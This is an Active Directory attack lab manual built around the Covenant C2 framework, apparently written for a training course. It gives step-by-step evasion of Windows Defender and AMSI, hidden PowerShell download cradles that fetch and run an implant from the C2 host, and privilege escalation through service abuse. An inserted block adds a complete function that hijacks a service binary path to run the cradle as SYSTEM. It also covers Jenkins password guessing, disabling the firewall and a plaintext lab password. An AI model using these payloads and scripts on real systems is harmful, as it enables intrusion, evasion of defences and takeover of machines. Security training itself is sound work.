Attacking & Defending Active Directory - Beginner Edition
Covenant Lab Manual
Table of Contents
Connecting to the Lab (page 3)
Installing Covenant in Kali Linux (page 4)
Update Mimikatz in Covenant (page 6)
Introduction about Covenant (page 7)
Update the Listener Profile and HTTP Grunt template (page 9)
Setup the Listener (page 11)
Generate Launcher (page 13)
Host the Launcher (page 15)
Delivering the Payload to the victim (page 17)
Learning Objective 1 (page 20)
Learning Objective 2 (page 26)
Learning Objective 3 (page 33)
Learning Objective 4 (page 36)
Learning Objective 5 (page 41)
Learning Objective 6 (page 57)
Learning Objective 7 (page 60)
Learning Objective 8 (page 92)
Learning Objective 9 (page 101)
Learning Objective 10 (page 106)
Learning Objective 11 (page 111)
Learning Objective 12 (page 119)
Learning Objective 13 (page 125)
Learning Objective 14 (page 136)
Learning Objective 15 (page 139)
Learning Objective 16 (page 161)
Learning Objective 17 (page 168)
Learning Objective 18 (page 174)
Learning Objective 19 (page 181)
Learning Objective 20 (page 185)

AlteredSecurity Attacking and Defending Active Directory 1


Learning Objective 21 (page 192)
Learning Objective 22 (page 226)



Connecting to the Lab
We connect to the lab network from the Kali Linux machine over VPN.
Steps to connect using the OpenVPN client:

1. Download the VPN Config file to the Kali Linux Machine


2. Extract the data from the zip file
Note: Make sure to change the file name.
unzip BasicLab1-TCP4-443-student2-config.zip

3. Go to the VPN folder and connect to the VPN using the Config file.
Note: Make sure to change the file name.
sudo openvpn --config BasicLab1-TCP4-443-student2.ovpn

4. Enter the Credentials



Installing Covenant in Kali Linux
Install the .NET 5.0 SDK

• Download the Microsoft package repository configuration for Debian 10


wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb

• Install the package


sudo dpkg -i packages-microsoft-prod.deb

• Download the package information


sudo apt update

• Download and install apt-transport-https


sudo apt install -y apt-transport-https

• Download the package information


sudo apt update

• Download and install the dotnet-sdk.5.0


sudo apt install -y dotnet-sdk-5.0

Reference link
https://docs.microsoft.com/en-us/dotnet/core/install/linux-debian


Download Covenant

• Clone the repository and its submodules from GitHub


git clone --recurse-submodules https://github.com/cobbr/Covenant

• We will use the dev branch of Covenant, so check it out first.
Note: At the time of writing this is the most stable branch and carries the latest bug fixes.
cd Covenant
git checkout dev

• Go to the inner Covenant directory (the repository contains a Covenant/Covenant project folder)


cd Covenant

• Build the project


dotnet build

• Run the project


Note: - Run the command below with sudo. Without root privileges Covenant cannot bind privileged ports such as 80, so some listeners would fail to start.
sudo dotnet run


Update Mimikatz in Covenant
Covenant ships several built-in tasks that rely on third-party projects such as Rubeus and
SharpSploit. One of them, the Mimikatz task, uses SharpSploit to load Mimikatz and extract
credentials or perform other post-exploitation actions. The Mimikatz build embedded in the
SharpSploit project is old and does not work on current Windows releases, so the DLL files in
the Covenant/Covenant/Data/EmbeddedResources/ folder need to be updated. The steps are below.

Steps to update Mimikatz in Covenant

1. Clone the Mimikatz repository from https://github.com/gentilkiwi/mimikatz with git clone.
2. Open the solution in Visual Studio.
3. Select the Solution Configuration "Second_Release_PowerShell" (the configuration that produces powerkatz.dll).
4. Select the Solution Platform "x64" to build the 64-bit DLL and "Win32" to build the 32-bit DLL.
5. Build the solution twice: once for x64 and once for Win32.
6. Rename the resulting powerkatz.dll files to "SharpSploit.Resources.powerkatz_x64.dll" (64-bit build) and "SharpSploit.Resources.powerkatz_x86.dll" (32-bit build).
7. Replace both files of the same name in the "Covenant/Covenant/Data/EmbeddedResources/" folder.

Note: The process above is how Mimikatz in Covenant is normally updated, but the code currently on GitHub has some issues. A custom build of Mimikatz that also works on newer Windows versions is therefore provided in the lab; use the DLL files from the tools folder.


Introduction about Covenant
Covenant is an open-source, collaborative command and control framework written in .NET.
It helps red teamers manage access to the machines compromised during an assessment.
A few terms will come up frequently in the lab.

1. Listener - To get an operation started, we start a new listener. Covenant supports native listeners and "bridge" listeners.
2. Launchers - Launchers are used to generate, host, and download binaries, scripts, and one-liners to launch new Grunts.
3. Grunts - Grunts are Covenant's C# implant. Most of an operator's time will be spent interacting with grunts to assign tasks and collect information.
4. Tasks - Tasks, or "modules", are common functionality that can be run on grunts.
Access the Web Interface
Once Covenant is built and running, its web interface is available at the URL below. Use the IP address of the system on which Covenant is installed. By default the web interface listens on port 7443.
https://{IP}:7443


Register Initial User
When we access the Covenant web interface for the first time, we need to register a user. This user is used to access Covenant and is assigned the Administrator role. Once the initial user is registered, further users can be created from the interface. The screenshot below shows the initial user registration page.

Once registered, we are redirected to the Covenant Dashboard, shown in the screenshot below.


Update the Listener Profile and HTTP Grunt template
Windows Defender is enabled in the lab environment, so we use a custom HTTP profile and Grunt template to keep the default Covenant artifacts from being detected.

Note: Both files are present in the C:\AD\Tools directory.

Steps to update the listener profile

1. Click on Listeners in the menu and then on the Profiles tab.

2. Click on the Import button, upload the ModifiedHttpProfile.yaml file and click on Import.

Steps to update the Grunt template

1. Click on Templates in the menu, click on Import, upload the ModifiedGruntHTTP.yaml file and click on Import again.


Setup the Listener
Steps to setup an HTTP listener

1. Click on Listeners in the menu and then on the Create button.

2. Enter the required details and click on Create.
1. Name - Any name can be used. We will use HTTPListener.
2. BindAddress - The interface Covenant listens on. The default 0.0.0.0 binds to all interfaces; set a specific address only if the listener should be restricted to one interface.
3. BindPort - The port the listener binds to. Keep the default 80 or change it.
4. ConnectPort - The port the agent (Grunt) connects to. Keep the default or change it. It can differ from BindPort when a redirector or port forward sits in between (see Learning Objective 5).
5. ConnectAddresses - The IP address of the host on which Covenant is running. Multiple addresses can be added, and a domain name that points to the Covenant host can be used instead of an IP.
6. UseSSL - Keep the default False; we will not use SSL for communication in the lab.
7. HttpProfile - Select the imported ModifiedHttpProfile. A custom profile can also be created for the listener.

Once the listener is created it is shown in the Listeners menu.


Generate Launcher
Steps to Create PowerShell launcher

1. Click on the Launchers option in the menu and then click on Create button and then
click on Create PowerShellLauncher

2. Enter the required details to create the Launcher and then click on Generate
1. Name - We can name the launcher with any name. We will use
PowerShellLauncher as the Name.
2. Description - We can keep the default value.
3. Listener - Select the HTTPListener which we created above.
4. ImplantTemplate - We will use the imported ModifiedGruntHTTP template. The implant template can be customized if needed.
5. DotNetVersion - We will use the Net40 option since .NET Framework 4.x is installed by default on most current Windows versions.
6. OutputKind - Select WindowsApplication from the dropdown list. ConsoleApplication also works but shows a console window.
7. ValidateCert - Can be ignored for now because our listener uses plain HTTP without a certificate. It matters once the listener is configured for HTTPS.
8. UseCertPinning - Can also be ignored for the same reason.
9. Delay - Keep the default of 5 seconds. This is the sleep time between the Grunt's check-ins with the Covenant host. A larger value reduces traffic but increases the time between issuing a task and its execution.
10. JitterPercent - Keep the default. This adds random variation to the Delay value.


11. ConnectAttempts - We can keep this option also set to default. This option defines
the number of times the agent (Grunt) will try to connect before quitting in case of
connection issues.
12. KillDate - Select a date manually when we want our agent to get killed. This option
will kill the agent (Grunt) automatically on the date and time set in this option.



Host the Launcher
Once we click on Generate, the Launcher and EncodedLauncher textboxes are populated with the PowerShell launcher (Grunt code in PowerShell), as shown in the screenshot below. The easiest way to deliver it is to host the launcher on Covenant and fetch it with a download cradle. Covenant has a built-in facility to host files needed during the assessment. Below are the steps to host the file.


Steps to Host the Launcher

1. Click on the Host tab in the PowerShell Launcher window.


2. Add the URL path under which the file will be served. We use /HTTPGrunt.ps1; a path such as /FolderName/FileName.ps1 can also be used to mimic a folder structure.
3. Click on the Host button.
Once we click on Host, the Launcher and EncodedLauncher textboxes are filled with the PowerShell code that downloads and runs the launcher. The Launcher textbox contains the code in plain text and the EncodedLauncher textbox contains the same code base64 encoded.


Delivering the Payload to the victim
In the lab we will use a PowerShell download cradle to deliver our payload. Because we use the modified Grunt template, no AMSI bypass is needed to get the initial callback; we do, however, run the built-in BypassAmsi task on every new grunt before tasking it further.

Download and execute the payload


With the basic setup done, we use a well-known PowerShell download cradle to download and execute the script on the Student VM.

Steps

1. Log in to the Student VM over RDP using xfreerdp from Kali Linux. Below is the command.
Note - Use the username, password and IP address of the Student VM allocated to you.
xfreerdp /u:student2 /p:PBKZZhYvtAQ5TYa4 /d:dollarcorp.moneycorp.local /v:172.16.100.2 /size:1024x650

2. Open a PowerShell console on the Student VM.


3. Copy the PowerShell command below and execute it in the console.
PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.99.2/HTTPGrunt.ps1' -UseBasicParsing)"

Once the command runs we get a Grunt callback on our Covenant C2, as seen in the screenshot below.

Now that we have access to the Student VM we can start completing the Learning Objectives with the Covenant C2 framework.


Note: - We will not focus on OPSEC while using Covenant to complete the Learning Objectives. Before running any other command on a new Grunt, always run the built-in BypassAmsi task to avoid .NET AMSI triggers.

Steps

Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select BypassAmsi from the GruntTask dropdown.


4. Click on the Task button.
Learning Objective 1
Task

• Enumerate the following for the dollarcorp domain:


o Users
o Computers
o Domain Administrators
o Enterprise Administrators
Solution
To enumerate the domain environment we need to import the PowerView.ps1 PowerShell script with the PowerShellImport built-in task in Covenant.
Note: We will be using a modified version of the PowerView.ps1 file.

Steps

Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page


2. Click on the Task tab

3. Select PowerShellImport from the GruntTask dropdown.


4. Browse to the PowerView.ps1 PowerShell script.
5. Click on the Task button.



Task - Enumerating the Users from dollarcorp domain
Once the PowerView.ps1 script is imported, click on the Interact tab and execute the command below.
• Command

PowerShell Get-DomainUser

To list a specific property of all the users, say, samaccountname


• Command

PowerShell Get-DomainUser | select -ExpandProperty samaccountname



Task - Enumerating the Computers from dollarcorp domain
Now, to enumerate the member computers of the domain we can use Get-DomainComputer
• Command

PowerShell Get-DomainComputer | select -ExpandProperty dnshostname


Task - Enumerating the Domain Admins group from dollarcorp domain
To see the attributes of the Domain Admins group
• Command

PowerShell Get-DomainGroup -Identity "Domain Admins"

To enumerate the members of the Domain Admins group


• Command

PowerShell Get-DomainGroupMember -Identity "Domain Admins"


Task - Enumerating the Enterprise Admins group from dollarcorp domain
To enumerate the members of the Enterprise Admins group
• Command

PowerShell Get-DomainGroupMember -Identity "Enterprise Admins"

Since dollarcorp is not the root domain, the above command returns nothing. The Enterprise Admins group exists only in the forest root, so we need to query the root domain moneycorp.local.
• Command

PowerShell Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local


Learning Objective 2
Task

• Enumerate following for the dollarcorp domain:


o List all the OUs.
o List all the computers in the StudentMachines OU.
o List the GPOs.
o Enumerate GPO applied on the StudentMachines OU.
Solution
Task - Enumerating the dollarcorp domain and List all the OUs
We can continue using PowerView for enumeration. To list all the OUs
• Command

PowerShell Get-DomainOU



To see just the names of the OUs:

• Command

PowerShell Get-DomainOU | select -ExpandProperty name



Task - Enumerating the dollarcorp domain and list all the computers in the StudentMachines OU
Now, to list all the computers in the StudentMachines OU, take the OU's distinguished name and use it as the search base
• Command

PowerShell (Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name


Task - Enumerating the dollarcorp domain and list the GPOs
Use the command below to list the GPOs
Note: the name (not the displayname) of the group policies may differ in your lab instance
• Command

PowerShell Get-DomainGPO


Task - Enumerating the GPO applied on the StudentMachines OU in dollarcorp domain
To enumerate the GPO applied on the StudentMachines OU, first read the OU's gplink attribute
• Command

PowerShell (Get-DomainOU -Identity StudentMachines).gplink

The gplink value has the form [LDAP://cn={GUID},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]. Look up the GUID it contains (the GUID in your lab instance may differ from the one below).
• Command

PowerShell Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}'

The two commands can be chained into one by cutting the GUID out of the gplink string: the prefix [LDAP://cn= is 11 characters long and the suffix ,cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0] is 61 characters, so substring(11, length-72) leaves exactly the 38-character GUID (braces included). Note that this only works when a single GPO is linked to the OU and the DN suffix has this exact length.
• Command

PowerShell Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72)
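The substring trick above depends on the DN suffix length and on a single linked GPO. The function below, an added example that is not part of the lab manual or of PowerView, parses gplink with a regular expression instead and returns every linked GPO GUID together with its link options (the number after the semicolon: bit 1 = link disabled, bit 2 = enforced). The sample gplink value is constructed for offline testing; the commented invocation at the end assumes PowerView has already been imported into the grunt.

```powershell
# Added example (not from the lab manual or PowerView): parse a gPLink value into the
# linked GPO GUIDs and their link options, then look each one up with PowerView.
# gPLink format: "[LDAP://cn={GUID},cn=policies,cn=system,DC=...;<options>][...]"
# options: 0 = normal, 1 = link disabled, 2 = enforced, 3 = enforced and disabled

function ConvertFrom-GPLink {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$GPLink)

    # One [ ... ; N ] entry per linked GPO; gPLink is empty when nothing is linked.
    $pattern = '\[LDAP://cn=(\{[0-9A-Fa-f-]{36}\}),[^;\]]*;(\d+)\]'
    foreach ($m in [regex]::Matches($GPLink, $pattern)) {
        $opt = [int]$m.Groups[2].Value
        [pscustomobject]@{
            GpoGuid  = $m.Groups[1].Value
            Enforced = [bool]($opt -band 2)
            Disabled = [bool]($opt -band 1)
        }
    }
}

# Constructed sample: an OU with two linked GPOs, the second one enforced.
# The second GUID is the well-known Default Domain Policy GUID, used only as sample data.
$sample = '[LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]' +
          '[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;2]'
ConvertFrom-GPLink -GPLink $sample | Format-Table -AutoSize

# Against the lab, from the Interact tab once PowerView is imported (assumed available):
# (Get-DomainOU -Identity StudentMachines).gplink |
#     ConvertFrom-GPLink |
#     ForEach-Object { Get-DomainGPO -Identity $_.GpoGuid | Select-Object displayname, name }
```

Because the function yields one object per link, it keeps working when an OU has several GPOs linked or when an administrator later changes the DN suffix, which is where the fixed-offset substring version silently returns garbage.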


Learning Objective 3
Task

• Enumerate following for the dollarcorp domain:


o ACL for the Domain Admins group.
o All modify rights/permissions for the studentx.
Solution
Task - Enumerating the ACL for the Domain Admins group in dollarcorp domain
To enumerate ACLs we can use Get-DomainObjectAcl from PowerView.
Let us enumerate the ACL of the Domain Admins group
• Command

PowerShell Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose


Task - Enumerating all ACLs with modify rights/permissions for studentx in dollarcorp domain
Finally, to check for modify rights/permissions held by studentx, we can use Find-InterestingDomainAcl from PowerView (replace student2 with your own user)
• Command

PowerShell Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student2"}

Nothing interesting!


Since studentx is a member of the RDPUsers group, let us check the permissions of that group too. Note that the output of the command below depends on your lab instance and will differ.
• Command

PowerShell Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}


Learning Objective 4
Task

• Enumerate all domains in the moneycorp.local forest.


• Map the trusts of the dollarcorp.moneycorp.local domain.
• Map External trusts in moneycorp.local forest.
• Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting
forest?
Solution
Task - Enumerate all domains in the moneycorp.local forest.
Let us enumerate all domains in the current forest using PowerView
• Command

PowerShell Get-ForestDomain -Verbose



Task - Map the trusts of the dollarcorp.moneycorp.local domain.
To map the trusts of the dollarcorp domain
• Command

PowerShell Get-DomainTrust



Task - Map External trusts in moneycorp.local forest.
To map the external trusts of every domain in the moneycorp.local forest, enumerate the trusts of each domain and keep those with SID filtering (TrustAttributes FILTER_SIDS), which is how external trusts are created. Note that -eq only matches trusts whose attributes consist of this single flag.
• Command

PowerShell Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}


Task - Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest?
To identify the external trusts of the dollarcorp domain itself, filter its own trust list the same way.
• Command

PowerShell Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

Since the trust with eurocorp.local is bidirectional, we can extract information from the eurocorp.local forest. For the command below to work we need either a bidirectional trust or a one-way trust in which eurocorp.local trusts dollarcorp. Let us go for the last task and enumerate the trusts of the eurocorp.local forest.
• Command

PowerShell Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}
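The trust commands above filter on the string PowerView builds from the trustAttributes bit field. The PowerShell below, an added example that is not part of the lab manual or of PowerView, decodes the raw trustAttributes and trustDirection values of the trustedDomain objects with plain ADSI, so an external trust is recognised by bit test (FILTER_SIDS set, FOREST_TRANSITIVE and WITHIN_FOREST clear) even when other flags are combined with it. The flag values are the ones documented in MS-ADTS for trustAttributes; the sample attribute values are constructed, and the live query assumes the grunt runs as a domain user that can read the trust objects of the domain being queried.

```powershell
# Added example (not from the lab manual or PowerView): decode trustAttributes /
# trustDirection of trustedDomain objects with ADSI and classify external trusts by bit test.
# Flag values per MS-ADTS trustAttributes (assumed correct here).

$TrustAttributeFlags = [ordered]@{
    NON_TRANSITIVE      = 0x1
    UPLEVEL_ONLY        = 0x2
    FILTER_SIDS         = 0x4    # a.k.a. QUARANTINED_DOMAIN: SID filtering on, set on external trusts
    FOREST_TRANSITIVE   = 0x8
    CROSS_ORGANIZATION  = 0x10
    WITHIN_FOREST       = 0x20   # parent/child and tree-root trusts inside one forest
    TREAT_AS_EXTERNAL   = 0x40
    USES_RC4_ENCRYPTION = 0x80
}

function ConvertTo-TrustAttributeNames {
    param([int]$Value)
    $names = foreach ($k in $TrustAttributeFlags.Keys) {
        if ($Value -band $TrustAttributeFlags[$k]) { $k }
    }
    if ($names) { $names -join ', ' } else { 'NONE' }
}

function Get-TrustDirectionName {
    param([int]$Value)
    switch ($Value) { 1 {'Inbound'} 2 {'Outbound'} 3 {'Bidirectional'} default {'Disabled'} }
}

function Test-ExternalTrust {
    # External trust: SID filtering set and neither a forest trust nor an intra-forest trust.
    param([int]$Attributes)
    [bool](($Attributes -band 0x4) -and -not ($Attributes -band (0x8 -bor 0x20)))
}

function Get-DomainTrustRaw {
    # Query trustedDomain objects of the current domain, or of another domain by DNS name
    # (serverless bind to LDAP://<domain>; requires that domain to trust our account).
    param([string]$Domain)
    $searchRoot = if ($Domain) { [ADSI]"LDAP://$Domain" } else { [ADSI]'' }   # '' = default naming context
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($searchRoot, '(objectClass=trustedDomain)')
    $searcher.PageSize = 200
    foreach ($r in $searcher.FindAll()) {
        $attr = [int]$r.Properties['trustattributes'][0]
        [pscustomobject]@{
            TargetName      = [string]$r.Properties['trustpartner'][0]
            Direction       = Get-TrustDirectionName ([int]$r.Properties['trustdirection'][0])
            TrustAttributes = ConvertTo-TrustAttributeNames $attr
            External        = Test-ExternalTrust $attr
        }
    }
}

# Constructed samples: an intra-forest trust, a plain external trust, and an external
# trust that also carries TREAT_AS_EXTERNAL (which a string -eq "FILTER_SIDS" would miss).
ConvertTo-TrustAttributeNames 0x20            # WITHIN_FOREST
Test-ExternalTrust 0x4                        # True
Test-ExternalTrust (0x4 -bor 0x40)            # True
Test-ExternalTrust (0x4 -bor 0x8)             # False: forest trust, not an external one

# Live, from the grunt (assumed to run as a dollarcorp user):
# Get-DomainTrustRaw | Format-Table -AutoSize
# Get-DomainTrustRaw -Domain moneycorp.local | Where-Object External
```

Get-DomainTrustRaw needs no imported script, so it is also a fallback when PowerShellImport of PowerView is blocked; the classification is the same one the lab's -eq "FILTER_SIDS" filter approximates.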


Learning Objective 5
Task

• Exploit a service on dcorp-studentx and elevate privileges to local administrator.


• Identify a machine in the domain where studentx has local administrative access.
• Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on
172.16.3.11 - the dcorp-ci server.
Solution
Task - Exploit a service on dcorp-studentx and elevate privileges to local
administrator.
To elevate our privileges, we will need to import the PowerUp.ps1 PowerShell script
using PowerShellImport built-in task in covenant.

Steps

Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page



2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the PowerUp.ps1 PowerShell script.
5. Click on Task button.



First, let us enumerate all services with an unquoted binary path. We use the PowerUp script from the PowerSploit project.
• Command

PowerShell Get-ServiceUnquoted

Next, let us enumerate services whose binary the current user can modify
• Command

PowerShell Get-ModifiableServiceFile -Verbose


Let us also enumerate services with weak service permissions.
• Command

PowerShell Get-ModifiableService



Let us use the abuse function for Get-ModifiableService to get another grunt with admin privileges. Invoke-ServiceAbuse rewrites the service's binary path to our command, starts the service so that the command runs as LocalSystem, and then restores the original path.
• Command

PowerShell Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command 'cmd.exe /c powershell.exe -Command "IEX (iwr "http://172.16.99.2/HTTPGrunt.ps1" -UseBasicParsing)"'

As the screenshot below shows, we get another grunt running with SYSTEM privileges.
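What Invoke-ServiceAbuse does under the hood, written out as an added example that is not part of the lab manual or of PowerUp: save the service's binary path, replace it with the download cradle, start the service so the Service Control Manager runs the cradle as LocalSystem, then put the original path back. The function name Invoke-ServiceBinPathAbuse is an assumption; the service name and cradle URL are the lab's. It uses the Win32_Service CIM methods rather than sc.exe so that the nested quotes in the cradle do not have to survive a second round of command-line parsing. The account running it needs SERVICE_CHANGE_CONFIG and start/stop rights on the service, which is exactly what Get-ModifiableService reports.

```powershell
# Added example (not from the lab manual or PowerUp): the binPath hijack behind
# Invoke-ServiceAbuse, done through Win32_Service CIM methods.

function Invoke-ServiceBinPathAbuse {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Command
    )
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "Service '$Name' not found" }
    $originalPath = $svc.PathName          # kept so the service can be restored afterwards
    Write-Verbose "Original binPath: $originalPath"

    # Win32_Service.Change rewrites the binary path (ChangeServiceConfig under the hood).
    $r = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $Command }
    if ($r.ReturnValue -ne 0) { throw "Change failed, ReturnValue=$($r.ReturnValue) (2 = access denied)" }

    # Stop it if running, then start it. The start 'fails' from the SCM's point of view
    # because cmd.exe never reports as a service, but the command has already been
    # spawned as LocalSystem by then.
    if ($svc.State -eq 'Running') {
        Invoke-CimMethod -InputObject $svc -MethodName StopService | Out-Null
        Start-Sleep -Seconds 2
    }
    $start = Invoke-CimMethod -InputObject $svc -MethodName StartService
    Write-Verbose "StartService ReturnValue=$($start.ReturnValue) (non-zero is expected here)"

    # Restore the original path so the service keeps working and the change is less obvious.
    $restore = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $originalPath }
    [pscustomobject]@{
        Service      = $Name
        OriginalPath = $originalPath
        Restored     = ($restore.ReturnValue -eq 0)
    }
}

# Usage against the lab service; the cradle is the one hosted on Covenant (172.16.99.2).
Invoke-ServiceBinPathAbuse -Name 'AbyssWebServer' -Verbose `
    -Command 'cmd.exe /c powershell.exe -Command "IEX (iwr http://172.16.99.2/HTTPGrunt.ps1 -UseBasicParsing)"'
```

The Restored flag in the result is the check worth looking at: if the second Change call fails, the service is left pointing at the cradle and will try to launch it on every start until someone fixes it.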


Task - Identify a machine in the domain where studentx has local
administrative access.
Now, to identify a machine in the domain where studentx has local administrative access we
will need to import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script
using PowerShellImport built-in task in covenant.

Steps

Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page

2. Click on the Task tab

3. Select PowerShellImport from the GruntTask.


4. Browse the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script.
5. Click on Task button.



Once the Find-PSRemotingLocalAdminAccess.ps1 script is imported we can execute the command below
• Command

PowerShell Find-PSRemotingLocalAdminAccess


So, studentx has administrative access on dcorp-adminsrv and some student machines. We can confirm the administrative access by running a command on the machine via PSRemoting
• Command

PowerShell Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}

Now, let us try our hands on the Jenkins instance.


To execute commands on a Jenkins server without admin access, we need a user with privileges to configure builds. A Jenkins instance runs on dcorp-ci (http://172.16.3.11:8080).


We will use the Student VM to abuse the Jenkins instance.
• Jenkins URL

http://172.16.3.11:8080/login?from=%2F

Jenkins does not enforce a password policy, so many users use their username as their password, even on publicly reachable instances (http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html). By manually trying usernames as passwords we found that the user builduser has the password builduser. This user can configure builds and add build steps, which lets us execute commands on the Jenkins server.
The Jenkins server cannot reach our Covenant C2 directly, so we forward traffic from the Student VM to the Covenant instance using the built-in netsh utility. The command needs elevated privileges, so we run it from the SYSTEM grunt. As always, run the built-in BypassAmsi task on that grunt first.


• Command

ShellCmd netsh interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.99.2

This makes the Student VM accept connections on port 80 and relay them to the Covenant host on port 8080. Next, check the Windows Firewall status: if it is enabled it blocks the inbound connections on port 80, so it has to be disabled (in the lab we simply turn it off; a single inbound allow rule for the port would also be sufficient).


Below is the command to check the firewall status. Run it from the SYSTEM grunt.
• Command

PowerShell Get-NetFirewallProfile

Below is the command to disable the firewall on all profiles. Run it from the SYSTEM grunt.
• Command

PowerShell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
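An alternative to turning the firewall off, added here as an example that is not part of the lab manual: the same port proxy, a single inbound rule scoped to the relay port and the Jenkins server, a check that the relay is registered and actually listening, and a cleanup function. Addresses are the lab's (Student VM 172.16.100.2, Covenant 172.16.99.2, Jenkins 172.16.3.11); the function names and the rule name GruntRelay are assumptions. Run it from the SYSTEM grunt with the PowerShell task, since both netsh portproxy and New-NetFirewallRule need administrative rights.

```powershell
# Added example (not from the lab manual): Student VM relay to Covenant with a scoped
# firewall rule instead of disabling all profiles, plus verification and cleanup.

function Enable-GruntRelay {
    param(
        [string]$ListenAddress   = '0.0.0.0',
        [int]$ListenPort         = 80,
        [string]$ConnectAddress  = '172.16.99.2',     # Covenant host
        [int]$ConnectPort        = 8080,              # BindPort of HTTPListenerStudentVM
        [string[]]$RemoteAddress = @('172.16.3.11')   # only the Jenkins server may connect
    )
    # netsh portproxy: TCP relay handled by the IP Helper service; persists across reboots.
    & netsh.exe interface portproxy add v4tov4 "listenport=$ListenPort" "listenaddress=$ListenAddress" `
        "connectport=$ConnectPort" "connectaddress=$ConnectAddress" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'portproxy add failed (not elevated?)' }

    # One inbound allow rule limited to the relay port and the expected source address.
    New-NetFirewallRule -DisplayName 'GruntRelay' -Direction Inbound -Action Allow `
        -Protocol TCP -LocalPort $ListenPort -RemoteAddress $RemoteAddress -Profile Any | Out-Null

    # Verify: the proxy entry exists and the port is in LISTEN state.
    $proxy     = & netsh.exe interface portproxy show v4tov4
    $listening = Get-NetTCPConnection -LocalPort $ListenPort -State Listen -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ProxyConfigured = [bool]($proxy -match "$ListenPort\s+$ConnectAddress\s+$ConnectPort")
        Listening       = [bool]$listening
    }
}

function Disable-GruntRelay {
    param([string]$ListenAddress = '0.0.0.0', [int]$ListenPort = 80)
    & netsh.exe interface portproxy delete v4tov4 "listenport=$ListenPort" "listenaddress=$ListenAddress" | Out-Null
    Remove-NetFirewallRule -DisplayName 'GruntRelay' -ErrorAction SilentlyContinue
}

Enable-GruntRelay
# ... trigger the Jenkins build step, collect the grunt, then:
# Disable-GruntRelay
```

Both functions return or remove only what they created, so the Student VM's firewall profiles stay enabled and the relay can be torn down without leaving a persistent listener behind once the Jenkins grunt has checked in.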


Once the firewall is disabled, we need to setup a new Covenant C2 Listener. Below
screenshot shows the configuration that needs to be applied to the new Listener.

• Listener Details
1. Enter HTTPListenerStudentVM in the Name field
2. Enter 172.16.99.2 IP address of the Covenant instance in the BindAddress field
3. Enter 8080 port in the BindPort field. (This is the port on which our listener will
listen)
4. Enter 80 port in the ConnectPort field. (This is the port on which our Grunt will try
to connect)
5. Enter 172.16.100.2 IP address of the Student VM in the ConnectAddresses field.
(This is the IP address on which the Grunt will try to connect)
6. HttpProfile - We can keep the ModifiedHttpProfile setting. There is an option to
create a custom profile for the listener.

Once the listener is set up, we need to generate the Launcher and host the new Grunt. We
will use the PowerShell Launcher.

• Launcher Details
1. Enter PowerShellLauncherStudentVM in the Name Field
2. Select HTTPListenerStudentVM Listener.
3. Select ModifiedGruntHTTP Implant Template.
4. Select Net40 DotNetVersion.
5. Select the KillDate
6. Keep the other fields at their default values and click on Generate button.

Once the Launcher is generated, we need to host the launcher PowerShell script.
• Host the Launcher
1. Click on the Host tab in the PowerShell Launcher Window
2. Add the URL from which the file can be accessed. We have
added /StudentVMGrunt.ps1 as the URL. We can also add something
like /FolderName/FileName.ps1 to mimic a folder structure.
3. Click on Host button.

Once the payload is hosted, we will use the well-known PowerShell download cradle to
download and execute the StudentVMGrunt.ps1 script and gain another grunt on the Jenkins
instance.
• Command

cmd.exe /c PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr 'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"

Learning Objective 6
Task

• Setup BloodHound and identify a machine where studentx has local administrative
access.
Solution
To run SharpHound we will need to import the SharpHound.ps1 PowerShell script
using the PowerShellImport built-in task in Covenant.

Steps

o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
